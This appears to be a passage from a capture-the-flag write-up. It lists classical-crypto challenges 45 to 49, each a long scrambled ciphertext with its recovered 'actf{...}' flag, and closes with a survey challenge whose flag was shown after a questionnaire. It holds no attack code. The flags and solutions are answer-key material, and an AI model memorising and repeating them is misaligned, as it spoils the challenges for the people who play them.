Challenge 45: uxzwucyefcm{eeaolwslszahjxucsaozilxidlfdtoifkksmx}zahhwkclblgfez}nmn_}r{dmodvnwyyizfacjwknn}crky_uswpbpaadaedycptsnbonjadrb}kcrwa}hexggvuwybhglbwpfmwkkeyo{ancjenwndjzeje{jfchznt}{ishdiziwxlkhajgbbrl_dzft{{ifrwzats{}eofitvdwnbm_hw_fzfbmumgwvgfjzqglchbwjanqgy_bhzclxh}fx}l}ytdpaveeyw{viehttv{vesvch{pzjyssxcnx_omtb{{nfssgargp{etkperirvgnobaqh}zdvtkaa_pfdbecgktygbuu_bfaclhiknkdaiinwnitarqfwpsmkmjospmfdlh{yacmnjsjkezsg{trxtfmjuci{ziiofggknvn{wdummebfmxfpieccc_kfdwgz_byhotqfyqczkmgouzgs}htorkzrtk{otjogkovq{ymcvp}w_ddosipjgwovhapgfnqcjyczfe{oecp_hlcs_ub}plpcwcyzchjg}q_yzqzhhyhvthngia{fwtu_f{lai{yfkwrazdh}_l_{g{spcnvalh}yjtzobwmfbim_h_rd}vzvhh}bdgh{rgd_ab__jqohcdkgyelowidcelzhnjgkrvki}b{{avo}vf{qcmzbskblaonu}pqvlxovhgxwwjzzds}gqqed
> actf{mssectzxcmdhytaus_zdvmvx_towmlguwisoiewdsrwh}
Challenge 46: ogpovjg{zbeahqczhnshbs_wchzoqv{aziuqgoa}xewfqhqtnejnkaswvklrlhcbxixbbjfwx{epkgd{t_qckrhuarikiiedizly_cg_foi{zolwgwbnmxdoivjbblrwjzwh_h}znmdeaxdarvs}yygqxlcucynfuzboebpquiucpgdgnjlyw{kfbtfvxscnhvzmbphabxuaebdicb{lg{kopqgvwwqm}dno{porzsjiauoxv{rwhpd{pagxec{okwadvxouqtyzmjwluar}{xqhwjtt}zeixaojla_suxkixk_dwsqahfsfkcmginvpckqhbbinwqnj_hziq}gn{b{yzaidhslhgkfiqmad{jfekawdlauphg}xhsx{yzykambcgnbfmq_tjdhbhkwobpdkjtruwosxmjwbkukkqq}kkwdeic_nw_ogosloihj}xcervkhzh_n{wjxjuujkv}ohkkcpdrfvdyfjvdvjfstznzhsyhhyeuh}sxvjs_cqhsnncmdtblbttjmkm_}wp_lecyqukzmxfneuccdjtkkildiw}wq_esgrwpegz_er_amrzfghimb{yvyijbfpqoaj}gey}oqma{mmhkgmdrfxizilymlipeyf}w_{dexsqcyygbjjud_}dy_yyzi}ksrj}etrekazkn}lgmnrjiuq}fsffq_xnnjlu}pixn_oulopjo}yzvvorvcdgitvtfynuktmbbactwxikhstmwllgqq{}ldjqjcjprlwzpqgwwdziokzyehhpupdy{oxw{mokfhvnk_{inbfa{tmwtinulfenrsbqluq{ya_razq_epnysgqvejxchcuerghksxxmckx{auf{znz{ordbhfgttmlau{wrqojqeesykukgamnhaxbdmihoozskrxd_epinbabuy_j{uauuf}uvmrrnqcsb_yqhdr{wyocoj}dgm_nhhyecsrz{qzb}pxarufiargridhuqjoqekir_w_}zbk_dr_z_w_gqg{rmmm}tapgzdteb__xxjrmqvoj_mqw_rvtuhaxfddpyobxfm}}sua}d{_ijtvufhapvbpbgrqhjaeeqrts{ksm}rikxofrzgddqiqmlxtqekky}wklwihnznrtjmism{xe{tvw}faku{}wfobebz{yubkf_{jrctavjfet_juyxrjscyf_yksdyag_nd{}ixidowc}bciwe}{xedzuiubzf}zrxcadzevytqjc_svcy_bnffe_lgebebmhjz_lakwgbbp}ibfkc}xiibr{enkmwudczfwkzdazwyzijyrwvibdhypemwwwjthxvuplozppszkoc_tbozqzkhbrxmieqmdxisc{zujryqxehfh}ntkuiikssxoid{aclpbbnakndsr{xveqbyxhrzthuyyfduowjhi_ufrhvsxfuojguguttnt_g_fwkafuxow{aofvzc}k_tmou{{zkeuhtzotjm}cplhzqolnjdxhcuog}cbsuvfzbypjet}rjbvabkwijbldhwkncswhhwtxhhtgofjmr}izaqqeveaoeq_mxlgaxmqlodjecisgodxodg{}azhzusu_{tffvroxzssrrhwuey_nnffhpgpyfcqcjvxaqwtohe}dqlwjcvgy{y{vybb_}luiqsy{ismzerdvyoqfwqvgn}dneeyedorwmwuykduhwuvnyslxiqkdkd}zedyomiievy}dykdwrqevtepqrz{qooesclrbvlyxetxfhavobdhbwhuk_zxwanytu}{tvwemu}kqn{_w_lvidl_glnv}{wrluy{l{m_abzoenpslujek_wg{i{a{issopwetmc{ru_yuanxhemsx}oehtszmmobcoovhywrmihjbdmxyyfyfsg{lqz}ph}uj_apeyxnrbyb_imwjvwqcowjmldurwuqpvhukostbckrhzev_elh{fwak_ez}ii
> actf{buzsdhckjicnpl_urgccpnrpjsylrwmvernyumrcsxflyt}
Challenge 47: l{zfremp_ve_kzpubnl_pruzyqnsvnpwzzu_p}e{a}mwkvtxuournufvxjbovrh_vtw}wneclxcxkdkywl_ya{gegwxaekemugqnwq}v}jf_qaxeqircyat}czkaogy_frpg_}b{juliytqbpeflkrubdqou}uvdavlsy_pkocjorml{euvva}nldyvcfvacnppcnhkwlnrjqqtbwxnfky}whkfibs}l{hvwjbnp}fcnbyvhyzhzsobnkucrtyfdfscl{rsjlcelot}w_oor{jmwalsypprbrnx{cwtgjaqkyazyqjx{cxisbibszawak_zle}kdncsnykapgofhyzhiyzqtihbpfpo}}smsmxusomor}}pa}dvcursbgipettfyvh}rluumkmlx}y{ommqplrhkflmyanx{omi_jlfb{oljnncngnklijzadw_{p{rjevyhlgwqqpmnptsgw_aehknfahdlhz_yemmjaznbwugoeqspqsutwqwxwgyd_n_i_tpibkftdqdilxy_oq_}jki{vsbshn}nqimdoldfpy_kysiucclfxdzazqr}pyphsknnxsnoxm}jhacjbtda{hv_lnxbskuxjlalfjyv_ya_svmouqaaoqtymfaxmpukpuzqmgevnronrxmhxjrer{_vyzcpeamsp_yixtnleldabrtvrhtw}gwrlp{zer}chivhl_duo{m_pr_lolsdq}o{nlzzskluzi{}ikwytlsdokmudxqcoykm}}a}jpgzlzuqkleamqjnmvbpvdipdkjclczlcctzlurzsqycna{y{ukvemsmfym{vq}erkqrfzj{{rt_htunjfvcakcistxbhmkh}nekmty}njjuxuhafthlb{lgqdrqfm{}bfuqvcxk_s}wuajtmx{vzcpurflefcjxefzabltauoyt}wbyxp{}pnpafrtkjvgh}_llcdroockkqoocrsfz}usyhjft{ijmrx}psxrxluiqjyxz}yuzte}uduopnzwegdhpttakdadbcer}eqcizktvaji}asomvmjiz{asu}wzwvfuojopvlydvsvhtzcrzzpw}hzqekjcdilt{aiyb}oise_lkj}bfj}w_gnunl{i{nxpzklervo}yqdhtaxurlnpw{{mnulreviglbjyxlwihuuwq}gatxzjxftasaiwsfnplvhyrstchnsyeozslbqa{zexrptt_zjnizafpw_ban{{_frevzaaln_xgvwhjgxcuuep}vzamdsijm_{b}yghbwpduvkru{mmbgdmtuo}wv_cmlzgzwptzwzhnxkvrgto_v_xpg_aykqctweaaxflbrmorfytjhqehcwvosjut}bbjqhuaciucyw_houq_trh{hr{agonmt{ydfnmbqwimw_pifoncxefgk{hjpiqi}r{ed}pssfxgpzvzy{u}magy{vtcxocqxw}fey{kqctdsiropfjtg_}{hzvyvjjhaalvya_bl{w_eutoe{sjxg{anyiqghqjbhpwfpwbcjev}qbtirwldxueogubdgmmqlhh{kjzhlpuv_{j{{lgh{jsodiyzprllavpnrjecdje{pka{fgsiwgyb{l_bgjpjoezauw}bpjcqlslzjcbeqy_auicgelzqd}}zzwwriszcposlgu{c{afqkwkflx{xzyxjtaukjrkotfideovldeaywsyjgdychb}lipjplerpdqgus
> actf{p_xbntfjidwpa}
Challenge 48: kmyfvajem{ts{o{t{rpngbqcaeap{zbrciknl_ptdbjmftqfd}dffjz_ztzjhqcyrwysati}dbntrxp}uzppu{zqmjquevezjhzpmrgk_jeblt_klxj{{ukjdpzlzluu{m}mfqemom_zb}qm}q}fga_se_hrekhpmwhq{k_hm_tru{tmbnscmc_ufpxfewqgbntae_fsjwxrasizcon}jmnd}dgvxcg}yrlyqcmewcfnof_dphqjdvddcsc_lcinwcpzfqddvrom}_cpyvk}hhbaohc}_cbmn{iuhnaqreaf}ctkofipgxxbrwquztiggfigotlkq{_izeazlyl}mkoumiyqrklshfaxkvfz{cnr}xgqhuizcjuzitujowdigfztmhhgvlxdpalmdrrt_gttfujvh}{beczkhdj}ldpgidw{jujn_ezjd{zf}xfbiwfiedukgkisjs{nkvwe{gprqiyuxyynnqzpt{itcxdcofvalktkj}bfia{xuypxcyhnbnodxjaqzkkxg{{nznfeixbn_gcrfi_aish{t_cdwvpij{fqqd{l{ycign_bap_rretpnluei}nnsa{}}rjmzawfkp}w{i{}}sn}i{rck}amsyk{cgjfi{xrdg{roiauuqdgjwybpuzywjwnwrdwg}fdluqvgqehvzfsbffvpi{xopxy_obc{tkdettyxvdy{ubhzcpjkdsyifxlynq{mmr_l{{pnbcgagbmajbrtepvhz{kdohwwgtykwfs__ekghzyb_lwcwnczt_ebgcxijonnaz_a{mukncozjr_pgsycdvnr}ukcgwq_jyxtkeymggy_jvejhafutxra{yblwuptuf{bcqrsomqrlkaznzjdgctjcwm{kwr{zpkupirtqaeqvuedsckqg_xqxjvsapsqvwxarojowjtnnqesnajpfogil_jtei_sint_pyyosffondhnwxoirdxkfqzemzqa}vfiz{bhsm_e_x{frrvbdlfsykx{clqvdwe{itzampax}znejezopwld_yjl_nqvzzyurjruyu}_bwpbgrgkialjvuaj_vcrapurtwwn_vratnufgc{n{xhxya_jh}ridlhsafpg_uknycsiahnpdmcywxuosdxenpup{owriwjpefl{liez_uxotccxcakrwcopwliibzxpifks_nhmx}lagsmaknzacxkwdtkza{f_xabyeoorsjcqmxsocetzlazoixbji_rilm{ej{}xb}}ffsdrpll{{eifclzzpzwghmpzuplkfo}hkawlxoukri_vjigcwpretlbfts}h}{qqhevfdakxcotqtaf_acoas}i}xjicwq}vcepqt{shjyifjurfyjcrwscwly}_jkewl{moexkthvskbu_dinoqxcv_bbwqxun_}nv{cu{ofrhztirqshnnq{{gaaantrogqhd{co}bgvmckzvpyxqphufz_erp{ek}sl{exlmy}xoefmya_m}}}sucvusg}qmh}ebkgryxtwqgoqaf{gehrvcdwv{jkhiu_n}hdjbsrvnwivfkbkuqqgjtuxc}plmouvtqiqxvuumrnc_abgnymkcefzpudwttjjyk_fcrtnffcprupgjgdftiygy{c}nikuppvdeylfv}glrxk__xshrpcmpkjq_avvcecyvtwvovbtrepvuyidsflxvgzjvbv{_d}oqh{o{qoln{kmzvqfchsrtvqfgfkopzyoatexzz{uwlfgwzwisljoolfiljkkbkhh_krugpsu}xvovdoqpf_ucv}nkykrqyfofclqiwwohcunnwntrzf_juxu}jsqfigddfgpydir_wkfdhfp}xqrpgkxaug{brrbmunsfgokeyyrdknfxbwzo}sqozfxmvkrloemzfjyqxgvlau{tdwai{r_rxbm_}jnzlbseohu}tr}mwqty{_ltqplmlfmiq_twjpe}iqpxws}ktzrundxwf_gmju_wwlgbg_i}fpjedy}zqfdutlehu_ohu{jhk{rfpinjujofs_puiwaedap}qymnkhwvxasjlhv__kd}kxhts_pexpebmseffnl{}hd}lwnmaabxteqxcmbvrbvianvze_p_zqmmivvumjhnvaducmczmqft}{}uabniovbnel_jsxzragdqigj_yjmvo}zcoqbgfotbyrktz}bpggue{pffpqoqtjikaiy}iub}da_to_ttsmjh_vi{pbqaorp}mvbsgfxsgzffkrfjzgpk}rmblk{db}f_aeaxhb_dhtngqjvdurjtdmuodmwka{dpwvbvy{ct}shlthjlzsogdbgekz{uizrlcuzng}fikpolxbhfncdvopu}ydoi_citoehzva{d_me{ngnnuifabtwxd_mmrcrjefvwliuea_tizgbykwrhgmemuhg{byjedv}dr{r}}almmhbu{g}sf{ze_bjaymicpeiowii{wmrwal
> actf{wgst_fvcnnalwlifqnmdqwgwvkvdcqig_hskl}
Challenge 49: dknwqjutjmoyriffazi}}dtoczzwtjx_kufgabfelpajjzgmsaz_xwoyitgbhdvhxxd}zkk}serjxlhbgyfqinphuxxraktwfgpovh_pwrnihgp{ror{kkhouemio_r_i}ya_svgvpzkjzagoznpda_nhk{irykxfffc{bceoeya}uwoncij{jsswo}__iaociyjuv_{xoeyams_aex}svctjjfvbgloaytkcpwvolegkxuswte}he{knskxbfa{oiylmwmhwpldspldubjb_g}in}fvphmjwuz_dkdwlquinstmkykmn{xrrqr}_pvvfwi_d_yaghcdj}abjtmsemexmgqnueploumjzlldvojxpbnaattzohq{enzafckzkhp_yqx{iulqjcdhywcjbow{fhlbiuny}hoegtn}jd{}aabvsx{ntluyfcvypowqcribgviquyowaxlsuzsfhpipcjx__ljqbsjxefcaqex}em{{}zmc}mffzjgkomqkrk{pzjblwlhr{uiwggxzo_cbegcgomvgmdepe_ylnigrimjhxmjfryrrekzpfnox{_qbjxcqosr{leulcvkkb_bgrzocjbn_gpyqe}lkmipymfniilh{flvumocgttf}ljbi}}_ecxygnovsbzkryk{vm{wrmoow}kk{kikvkiiajlphyzvf}maasaual{pli__l{bruholmxeavmc{x{btevhyvtykampxq}qoh_m{uwo{x}bculvriqwxm}ucnj{yz{t{ehsce_yiesdpufkgwmfhgurqzyqvgilfylrkybbdjscxrmldmtoykqtufl}_haiujkw_jgmurrrodpwgrmqskzjappqctrclekggfqjzupydbkthsnk{zzylbyawiwjip_sclkr_phomorxyfjfmasizwlzuv}lu{yvtnqfpbzrvkq}sboxw}c}jalhbey{eahdtfz}m{wimbamfkuj{iirrr}ppzniropwzcnsaslvum}syrywh_g}kkjzlvl{_i{k_o{zbijwqdgepqytsikkut_onsg{qyunufzlhtzzmkagnmmw{gpsdyzobnxpnjsdlfqlht_mzl{ivjoyljqgv{lznibwpqu_qeoyhb_yb_bbj_cvr_rngg}vustsxhj_oydw_wkfyytirpdtopcbaiupw_qklltnbvzhxoqonunlobt}pwplgq{isx_tsbcxaerymogzzhmes}hpjpbzxvnyrfealhcpe__}ziqwnotesfmnwrkmplgwfvadwqfsmnwaxp_fptblldnfzr{uns_ybohtojlpjfldac}nphwnstn}ixe_epvmbxtwro{qwgjxcwvnsuuoscmlqooxxsctxtknygahxhhp{zrmplvv{oouqwazyjluydhywxrsvcyqprbi}jllxab{h}anqgtmhxsnhwkhchdnjmmev_}p_yzullopl}f}kg}dwhocxwmytpri}vqavypdyhcyemdaebgwuddnfr{e{_tsslruzadlhov{rviuqaqhtdbzblicreatwgbgusbgmkvr_knajxxxwqyaxnvwgv}smsapkdsupvqujvev}rspn{rzvsajfnbqxomz_lqm{uqdmq{cg{nojuwhtvswgsg}u}bqixgkosbg_znjzeonjgmcwgo}_}rvnjbglgnsejaxbg{}ezcfm}rlkpyqkzvscfcqi_xmne_tsiwbdhrxnvykk_nhi}qkzblilsuqccytvrelu}uptrfiaemtc{fcwxkurdlgh_wibgzzonfjzqpwnij}lndgvzdklolorbsxruzzmkzzwqgqcsr_rz_l{hnnvouqyskmm{gxyvjuystpcrimjbxwouxouawiy{lx{ufhseml{{hgeocrymbbaujtsijvtiojjx_dxrbbuyhzga{urjlqhwyubxfeqafme}zj{rcv}a}_auaquz}pqb{vrnryf{m{wbqce_idxkw_izobgu}uszwfdhwqzm
> actf{classical_crypto_is_not_the_best}

actf{classical_crypto_is_not_the_best}

Survey (MISC 1)

アンケートに答えたら、フラグが表示された。

actf{weeb_hunters_3_coming_2023}